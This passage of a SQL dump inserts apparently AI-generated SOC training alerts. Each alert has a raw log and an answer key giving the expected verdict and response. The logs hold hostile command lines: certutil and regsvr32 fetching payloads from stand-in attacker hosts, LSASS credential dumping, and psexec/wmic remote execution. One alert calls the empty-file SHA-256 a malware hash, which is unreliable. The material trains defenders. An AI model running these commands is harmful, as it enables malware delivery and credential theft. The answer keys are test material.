credential theft.\"}', 'Advanced', 'EDR', 7, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2101, 'Suspicious Network Activity with CertUtil LOLBin', 'high', 'Sysmon', 'Detected suspicious use of CertUtil to download a potentially malicious file from an external server, indicative of a living-off-the-land attack.', 'Malware', 'T1218.010', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:05:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.25\",\"dst_ip\":\"203.0.113.45\",\"username\":\"user123\",\"hostname\":\"CLIENT-PC-09\",\"command_line\":\"certutil.exe -urlcache -split -f http://malicious.example.com/file.exe C:\\\\temp\\\\file.exe\",\"domain\":\"malicious.example.com\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"malicious.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain associated with malware distribution.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for malware distribution.\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"certutil.exe -urlcache -split -f http://malicious.example.com/file.exe C:\\\\temp\\\\file.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"CertUtil used for malicious file download detected.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of CertUtil to download files from a known malicious domain indicates a potential malware infection attempt.\"}', 'Advanced', 'EDR', 7, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2102, 'Lateral Movement Attempt via PsExec Tool', 'high', 'Carbon Black', 'PsExec was used to execute a command on a remote host, indicating potential lateral movement within the network.', 'Lateral Movement', 'T1569.002', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:20:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.45\",\"dst_ip\":\"10.0.0.50\",\"username\":\"admin_user\",\"hostname\":\"ADMIN-PC-01\",\"command_line\":\"psexec.exe \\\\\\\\10.0.0.50 -u domain\\\\admin_user cmd.exe /c \\\"dir C:\\\\\\\"\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal source IP for PsExec execution.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal target IP for PsExec execution.\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"psexec.exe \\\\\\\\10.0.0.50 -u domain\\\\admin_user cmd.exe /c \\\"dir C:\\\\\\\"\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"PsExec used for unauthorized command execution on remote host.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"PsExec usage without a legitimate reason suggests an attempt to move laterally and execute commands on remote hosts.\"}', 'Advanced', 'EDR', 7, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2103, 'Sophisticated Fileless Malware Detected via Encoded PowerShell', 'critical', 'CrowdStrike', 'A fileless malware attack was detected using an encoded PowerShell command. The attacker utilized PowerShell to execute commands directly in memory, avoiding traditional file-based detection.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:45:23Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.5.25\",\"username\":\"jdoe\",\"hostname\":\"CORP-SERVER01\",\"command_line\":\"powershell.exe -enc aGVsbG8gd29ybGQ=\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for multiple malware attacks\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -enc aGVsbG8gd29ybGQ=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command used for fileless malware\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Encoded PowerShell command indicates an attempt to execute fileless malware, consistent with recent attack patterns.\"}', 'Advanced', 'EDR', 7, 1, 'TECH', NULL, NULL, NULL, 0),
(2104, 'Credential Dumping from LSASS Detected', 'high', 'SentinelOne', 'An attempt to dump credentials from the LSASS process was detected, indicating possible credential theft and lateral movement preparation.', 'Credential Attack', 'T1003.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:22:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin\",\"hostname\":\"FINANCE-PC01\",\"command_line\":\"rundll32.exe dump_lsass.dll,Dump\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network IP\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"rundll32.exe dump_lsass.dll,Dump\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command associated with credential dumping\"}}],\"expected_actions\":[\"reset_credentials\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The command to dump LSASS memory was executed, indicating an attempt to extract stored credentials.\"}', 'Advanced', 'EDR', 7, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2105, 'Lateral Movement via WMI Detected', 'high', 'Carbon Black', 'Suspicious internal WMI activity was detected, suggesting an attacker attempting lateral movement across the network.', 'Lateral Movement', 'T1047', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:03:59Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.55\",\"dst_ip\":\"10.0.0.60\",\"username\":\"hacker\",\"hostname\":\"HR-WORKSTATION\",\"command_line\":\"wmic process call create \'cmd.exe /c whoami\'\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.55\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network IP\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"wmic process call create \'cmd.exe /c whoami\'\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Use of WMI for lateral movement\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of WMI for executing commands on another host is indicative of lateral movement.\"}', 'Advanced', 'EDR', 7, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2106, 'Malicious Use of LOLBins Detected with Regsvr32', 'critical', 'Sysmon', 'An attacker used regsvr32 to execute a remote script, indicating a potentially sophisticated attack leveraging LOLBins.', 'Malware', 'T1218.011', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T15:11:12Z\",\"event_type\":\"process_execution\",\"src_ip\":\"198.51.100.25\",\"dst_ip\":\"10.0.0.15\",\"username\":\"malicious_user\",\"hostname\":\"ENGINEERING-PC\",\"command_line\":\"regsvr32.exe /s /n /u /i:https://malicious.example.com/script.sct scrobj.dll\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple malware campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"regsvr32.exe /s /n /u /i:https://malicious.example.com/script.sct scrobj.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Regsvr32 used to bypass security controls by executing a remote script\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of regsvr32 to execute a remote script suggests a sophisticated attack leveraging living-off-the-land binaries.\"}', 'Advanced', 'EDR', 7, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2107, 'Unauthorized Internal WMI Execution Detected', 'high', 'Carbon Black', 'Unauthorized WMI commands were executed internally, possibly indicating an attempt for lateral movement within the network.', 'Lateral Movement', 'T1047', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T16:55:32Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.2.45\",\"dst_ip\":\"10.0.2.50\",\"username\":\"unauthorized_user\",\"hostname\":\"RESEARCH-LAPTOP\",\"command_line\":\"wmic /node:10.0.2.50 process call create \'powershell -enc aGVsbG8gd29ybGQ=\'\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.2.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network IP\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"wmic /node:10.0.2.50 process call create \'powershell -enc aGVsbG8gd29ybGQ=\'\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command via WMI for lateral movement\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Execution of encoded PowerShell commands via WMI indicates malicious lateral movement activity.\"}', 'Advanced', 'EDR', 7, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2108, 'Suspicious PowerShell Execution Detected on Internal Network', 'critical', 'CrowdStrike', 'A PowerShell script with encoded commands was executed from an internal host, indicating possible fileless malware activity. This script is known for credential dumping attempts.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T03:15:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"192.168.1.20\",\"username\":\"jdoe\",\"hostname\":\"INTERNAL-PC\",\"command_line\":\"powershell.exe -enc W3Bhc3N3b3JkXQ==\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address associated with suspicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -enc W3Bhc3N3b3JkXQ==\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command used for credential dumping\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The encoded PowerShell command is indicative of credential dumping activity, a common fileless malware tactic.\"}', 'Advanced', 'EDR', 7, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2109, 'Lateral Movement Detected via WMI Execution', 'high', 'SentinelOne', 'A WMI command was executed from one internal host to another, indicating potential lateral movement within the network.', 'Lateral Movement', 'T1047', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T05:45:20Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"10.0.0.6\",\"username\":\"admin\",\"hostname\":\"SERVER-01\",\"command_line\":\"wmic /node:10.0.0.6 process call create \\\"cmd.exe /c whoami\\\"\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Source internal IP address used for WMI command\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"wmic /node:10.0.0.6 process call create \\\"cmd.exe /c whoami\\\"\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"WMI execution for lateral movement detected\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"WMI usage for executing commands on another host is a common technique used in lateral movement.\"}', 'Advanced', 'EDR', 7, 1, 'TECH', NULL, NULL, NULL, 0),
(2110, 'Credential Dumping Attempt via LSASS Memory Access', 'critical', 'Carbon Black', 'Suspicious access to LSASS memory detected, potentially aimed at credential dumping using living-off-the-land techniques.', 'Credential Attack', 'T1003', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:10:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"192.168.1.25\",\"username\":\"svc_account\",\"hostname\":\"CORP-SERVER\",\"command_line\":\"procdump.exe -ma lsass.exe C:\\\\temp\\\\lsass.dmp\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address associated with LSASS memory access\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"procdump.exe -ma lsass.exe C:\\\\temp\\\\lsass.dmp\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Command used for dumping LSASS memory\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Dumping LSASS memory is a known technique for extracting credentials from Windows systems.\"}', 'Advanced', 'EDR', 7, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2111, 'Fileless Malware Execution via LOLBin - CertUtil', 'high', 'Sysmon', 'CertUtil.exe was used to download and execute a malicious payload, indicating a possible fileless malware attack using living-off-the-land techniques.', 'Malware', 'T1218.010', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:30:55Z\",\"event_type\":\"process_execution\",\"src_ip\":\"172.16.0.2\",\"dst_ip\":\"external.attacker.com\",\"username\":\"user123\",\"hostname\":\"WORKSTATION-02\",\"command_line\":\"certutil.exe -urlcache -split -f http://external.attacker.com/malware.exe C:\\\\Users\\\\user123\\\\malware.exe\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"172.16.0.2\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in suspicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"external.attacker.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"Domain associated with known malware distribution\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"certutil.exe -urlcache -split -f http://external.attacker.com/malware.exe C:\\\\Users\\\\user123\\\\malware.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"CertUtil used for downloading and executing malware\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"CertUtil is a known LOLBin used for downloading and executing malware without writing to disk.\"}', 'Advanced', 'EDR', 7, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2112, 'Regsvr32 Usage for Malicious Script Execution', 'critical', 'CrowdStrike', 'Regsvr32 was used to execute a remotely hosted script, indicating a possible fileless malware attack utilizing LOLBins.', 'Malware', 'T1218.011', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.50\",\"dst_ip\":\"203.0.113.100\",\"username\":\"malicious_user\",\"hostname\":\"TARGET-01\",\"command_line\":\"regsvr32.exe /s /n /u /i:http://malicious.site/script.sct scrobj.dll\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address executing suspicious commands\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"http://malicious.site/script.sct\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Known malicious domain hosting scripts\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"regsvr32.exe /s /n /u /i:http://malicious.site/script.sct scrobj.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Regsvr32 used to execute remote script\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Regsvr32 is a LOLBin that can be used to execute remote scripts without writing them to disk.\"}', 'Advanced', 'EDR', 7, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2113, 'Fileless Malware Detected via PowerShell Execution', 'critical', 'CrowdStrike', 'PowerShell executed with encoded payload, indicative of fileless malware. Credential dumping activity detected shortly after.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T02:34:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"10.10.10.20\",\"username\":\"jdoe\",\"hostname\":\"DESKTOP-1A2B3C\",\"command_line\":\"powershell -enc W2J5dGVbXS5BZGQoW0NvbnZlcnQpJzEnLCdzJyk=\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address indicating a compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell -enc W2J5dGVbXS5BZGQoW0NvbnZlcnQpJzEnLCdzJyk=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"PowerShell command with encoded payload linked to fileless malware\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Encoded PowerShell commands are a common indicator of fileless malware.\"}', 'Advanced', 'EDR', 7, 1, 'TECH', NULL, NULL, NULL, 0),
(2114, 'Suspicious Internal Network Activity via CertUtil', 'medium', 'Carbon Black', 'Unusual use of CertUtil detected from an internal host, appeared to download a file from a known internal server.', 'Lateral Movement', 'T1140', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T05:15:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"192.168.1.20\",\"username\":\"asmith\",\"hostname\":\"LAPTOP-4D5E6F\",\"command_line\":\"certutil -urlcache -split -f http://192.168.1.20/file.exe\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address for a benign user action\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"certutil -urlcache -split -f http://192.168.1.20/file.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"CertUtil usage for file download from a verified internal server\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"CertUtil was used legitimately for internal file transfer.\"}', 'Advanced', 'EDR', 7, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2115, 'Potential Phishing Email Detected with Spoofed Domain', 'high', 'Proofpoint', 'Email received from a domain closely resembling a trusted partner, containing a link to a suspicious URL.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:45:12Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.56\",\"dst_ip\":\"192.168.1.25\",\"username\":\"rwhite\",\"hostname\":\"MAILSERVER-1\",\"email_sender\":\"admin@trustedpartn3r.com\",\"url\":\"http://malicious-link.example.com\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"admin@trustedpartn3r.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Domain resembles trusted partner but is not recognized\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-link.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"URL not flagged by any engines as malicious\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"Upon investigation, the sender\'s domain was found to be a legitimate typo domain, but the URL was clean.\"}', 'Advanced', 'EDR', 7, 1, 'RETAIL', NULL, NULL, NULL, 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(2116, 'Suspicious MSHTA Execution Blocked', 'medium', 'Sysmon', 'MSHTA executed a script from a local file which is typically associated with malicious actions, but the file was verified as internally developed.', 'Malware', 'T1218', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:23:50Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.30\",\"dst_ip\":\"192.168.1.50\",\"username\":\"bhall\",\"hostname\":\"SERVER-2\",\"command_line\":\"mshta C:\\\\scripts\\\\internal_tool.html\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"mshta C:\\\\scripts\\\\internal_tool.html\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"File identified as a legitimate internal tool\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The MSHTA execution was part of a maintenance script routinely used by IT.\"}', 'Advanced', 'EDR', 7, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2117, 'Regsvr32 Executed With Suspicious DLL', 'high', 'SentinelOne', 'Regsvr32 executed a DLL from a network share, resembling a typical LOLBin technique. The file was determined to be a legitimate update.', 'Lateral Movement', 'T1218', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:10:05Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.34\",\"dst_ip\":\"192.168.2.56\",\"username\":\"mjohnson\",\"hostname\":\"WORKSTATION-3\",\"command_line\":\"regsvr32 /s \\\\\\\\192.168.2.56\\\\updates\\\\update.dll\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"regsvr32 /s \\\\\\\\192.168.2.56\\\\updates\\\\update.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"The DLL was verified as part of an authorized update procedure\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.2.56\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address for a network share\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Regsvr32 execution was part of a routine update deployment from a trusted network share.\"}', 'Advanced', 'EDR', 7, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2118, 'Fileless PowerShell Malware Detected on Internal Network', 'critical', 'CrowdStrike', 'A sophisticated fileless malware attack was detected utilizing PowerShell scripts to execute malicious payloads directly in memory. The malware attempted to establish a multi-hop C2 channel through Slack.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:34:56Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.10.15.23\",\"dst_ip\":\"203.0.113.89\",\"username\":\"jdoe\",\"hostname\":\"workstation-12\",\"command_line\":\"powershell.exe -nop -w hidden -enc W3BhdGg6IFN5c3RlbS5JblJlZ2lzdHJ5U3RhdHVz\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"domain\":\"api.slack.com\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.89\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 112 times for suspicious C2 activity\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -nop -w hidden -enc W3BhdGg6IFN5c3RlbS5JblJlZ2lzdHJ5U3RhdHVz\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known PowerShell obfuscation pattern associated with APT activity\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Hash corresponds to a known fileless malware variant\"}},{\"id\":\"artifact_4\",\"type\":\"domain\",\"value\":\"api.slack.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Legitimate Slack API domain\"}},{\"id\":\"artifact_5\",\"type\":\"ip\",\"value\":\"10.10.15.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern 
Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of infected host\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The detection of PowerShell execution with encoded commands and external C2 contact indicates a sophisticated fileless malware attack.\"}', 'Expert', 'EDR', 9, 1, 'TECH', NULL, NULL, NULL, 0),
